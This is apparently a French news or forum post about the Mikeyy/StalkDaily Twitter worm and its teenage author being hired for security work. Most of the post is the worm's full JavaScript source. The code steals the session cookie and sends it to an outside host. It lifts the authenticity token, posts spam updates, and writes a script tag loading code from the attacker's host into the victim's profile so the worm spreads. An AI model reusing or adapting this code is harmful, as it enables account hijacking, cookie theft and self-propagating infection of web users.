Le créateur du virus twitter embauché pour s'occuper de sécurité informatique

Le créateur d'un virus/ver qui avait infecté le site de microblogging Twitter a été embauché par une société informatique pour s'occuper de sécurité.

Mike Mooney, en codant un virus diffusé sur le site/réseau social Twitter semble avoir trouvé un remède efficace à la crise puisque que la société ExqSoft Solutions LLC lui a proposé un emploi comme développeur et analyste de la sécurité.

La société semble avoir été impressionné par l'exploit de ce jeune new-yorkais de 17 ans qui a codé
son virus à la main semble-t-il "par ennui" et pour promouvoir son site StalkDaily.com. Cet exploit avait toutefois causé quelques désagréments chez les utilisateurs de Twitter qui s'étaient retrouvé infecté, nous donnions d'ailleurs quelques recommandations pour éviter et se débarrasser du virus la semaine dernière: Virus twitter mikeyy/stalkdaily : comment le supprimer

Ce fait n'est pas une première, il arrive régulièrement que des créateurs de virus réussissent à trouver un emploi suite à la diffusion de leurs fichiers malveillants. Il ne faudrait toutefois pas que cela devienne une habitude, même si après coup, certains se féliciteront de les voir passer du bon côté de la lutte anti-malware plutôt que de continuer à infecter nos ordinateurs pour des buts moins avouables.

Il y a quelque temps un jeune autodidacte de la sécurité, Owen Thor Walker, avait lui aussi décroché un job après avoir infecté des dizaines de milliers de machines dans le but de se créer un botnet

Voici "le code source de l'attaque XSS" :

Code:

function XHConn()
{
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
function urlencode( str ) {         
    var histogram = {}, tmp_arr = [];
    var ret = str.toString();
   
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
   
    histogram["'"]  = '%27';
    histogram['(']  = '%28';
    histogram[')']  = '%29';
    histogram['*']  = '%2A';
    histogram['~']  = '%7E';
    histogram['!']  = '%21';
    histogram['%20'] = '+';
   
    ret = encodeURIComponent(ret);
   
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
   
    return ret;
}
 
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);
var username = userreg.exec(content);
username = username[1];
 
var cookie;
cookie = urlencode(document·cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
function wait()
{
  var content = document.documentElement.innerHTML;
 
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];
  //alert(authtoken);
 
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, [Vous devez être inscrit et connecté pour voir ce lien] is awesome. What's the fuss?";
  randomUpdate[1]="Join [Vous devez être inscrit et connecté pour voir ce lien] everyone!";
  randomUpdate[2]="Woooo, [Vous devez être inscrit et connecté pour voir ce lien] :)";
  randomUpdate[3]="Virus!? What? [Vous devez être inscrit et connecté pour voir ce lien] is legit!";
  randomUpdate[4]="Wow...www.StalkDaily.com";
  randomUpdate[5]="@twitter [Vous devez être inscrit et connecté pour voir ce lien]
 
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
 
  updateEncode = urlencode(genRand);
 
  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
 
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
setTimeout("wait()",3250);


C'est très répondu cet acte, embaucher un fraudeur de sécurité au sein de la même société attaquée, car c'est le mieux placé pour connaitre les failles !!!